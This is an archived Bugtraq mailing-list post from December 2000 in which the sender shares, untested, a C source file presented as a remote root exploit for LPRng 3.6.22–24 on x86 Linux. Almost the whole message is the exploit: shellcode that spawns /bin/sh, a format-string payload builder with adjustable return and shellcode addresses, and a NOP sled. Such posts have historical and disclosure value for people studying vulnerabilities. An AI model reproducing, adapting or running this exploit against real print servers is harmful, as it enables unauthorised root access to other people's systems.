[17998] in bugtraq
Re: lpd buffer overflow
daemon@ATHENA.MIT.EDU (gabriel maggiotti)
Sun Dec 10 19:22:59 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------=_4D4801152B14085221C8"
Content-Transfer-Encoding: 7bit
Message-Id: <20001207.21164700@pluto.net>
Date: Thu, 7 Dec 2000 21:16:47 GMT
Reply-To: gabriel maggiotti <gmaggiot@CIUDAD.COM.AR>
From: gabriel maggiotti <gmaggiot@CIUDAD.COM.AR>
To: BUGTRAQ@SECURITYFOCUS.COM
--------------=_4D4801152B14085221C8
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Hello guys,
I'd been searching the net for the 'lpd exploit' since I read about it i=
n=20
the first mail. I found this code yesterday, but didn't try it yet.
Please mail me if somebody tries it. Thanks guys.
--------------=_4D4801152B14085221C8
Content-Description: filename="lpd-ex.c"
Content-Disposition: inline; filename="lpd-ex.c"
Content-Type: text/plain; name ="lpd-ex.c"
Content-Transfer-Encoding: quoted-printable
/* LPRng remote root exploit for x86 Linux
* 9/27/00=20
*
* - JimJones
* tested on compiled LPRng 3.6.22/23/24=20
*
*/
#include <unistd.h>
#include <stdio.h>
char sc[]=3D
"\x29\xdb\x29\xc0\x29\xd2\x31\xc9\xfe\xca\xb0\x46\xcd\x80\x29\xff"
"\x47\x47\x47\x43\x43\x43\x31\xc9\x29\xc0\xb0\x3f\xcd\x80\x41\x39"
"\xf9\x75\xf5\x39\xd3\x7e\xee\xeb\x19\x5e\x89\xf3\x89\xf7\x83\xc7"
"\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x0b"
"\xcd\x80\xe8\xe2\xff\xff\xff/bin/sh"
;
#define NOP 0x90 //will be split up, doesn't matter
int main(int argc, char** argv) {
char getbuf[1000];
int bpad=3D0; /* was 2 */ /* 3 for other */
/* 2 - -34
3 - -41
0 - -42
*/
int i=3D0;
int eiploc=3D0x41424344;
char buffer[1024];
char fmtbuf[128];
int shloc=3D-1; //0xbffff2c8;
int hi=3D100;=20
int lo=3D200;
int pre=3D0;
int align=3D-36;
int pos=3D511; //483; //488; /*299;*/
int debug=3D0;
char s=3D0;
char mode=3D'n';
while ( ( s=3Dgetopt(argc, argv, "a:b:e:s:p:d")) !=3D EOF) {
switch(s) {
case 'a': align=3Datoi(optarg); break;
case 'b': bpad=3Datoi(optarg);
break;
case 'e': eiploc=3Dstrtoul(optarg, 0,0);
break;
case 's': shloc=3Dstrtoul(optarg, 0, 0);
break;
case 'p': pos=3Datoi(optarg); break;
case 'd': debug=3D1; break;
default:
}
}=09
if (shloc =3D=3D -1) shloc=3Deiploc+2450;
memset(buffer, 0, sizeof(buffer));
memset(fmtbuf, 0, sizeof(fmtbuf));
memset(buffer, 'B', bpad);
*(long*)(buffer+strlen(buffer))=3Deiploc+2;
*(long*)(buffer+strlen(buffer))=3D0x50505050;
*(long*)(buffer+strlen(buffer))=3Deiploc;
pre=3Dstrlen(buffer);
if (debug) { mode=3D'p'; hi=3D100; lo=3D100; }
else {
hi=3D((shloc >> 16)&0xffff)-pre+align; /* was no 7 */
lo=3D((shloc >> 0)&0xffff)+0x10000-((shloc >> 16)&0xffff);
}
sprintf(fmtbuf, "%%%dd%%%d$h%c%%%dd%%%d$h%c", hi, pos, mode, lo, pos+2,=
mode);
strcat(buffer+strlen(buffer), fmtbuf);
/* make it easier to hit shellcode */
memset(buffer+strlen(buffer), NOP, 385);
strcat(buffer, sc);
*(char*)(buffer+strlen(buffer))=3D0;
fprintf(stderr, "strlen(fmtbuf): %i\n", strlen(fmtbuf));
fprintf(stderr, "pos: %i\n", pos);
fprintf(stderr, "align: %i\n", align);
fprintf(stderr, "eip location: 0x%x\n", eiploc);
fprintf(stderr, "shellcode location: 0x%x\n", shloc);
fprintf(stderr, "strlen(sc): %i\n", strlen(sc));
fprintf(stderr, "strlen(buffer): %i\n", strlen(buffer));
printf("%s", buffer);
putchar('\n');
}
--------------=_4D4801152B14085221C8--
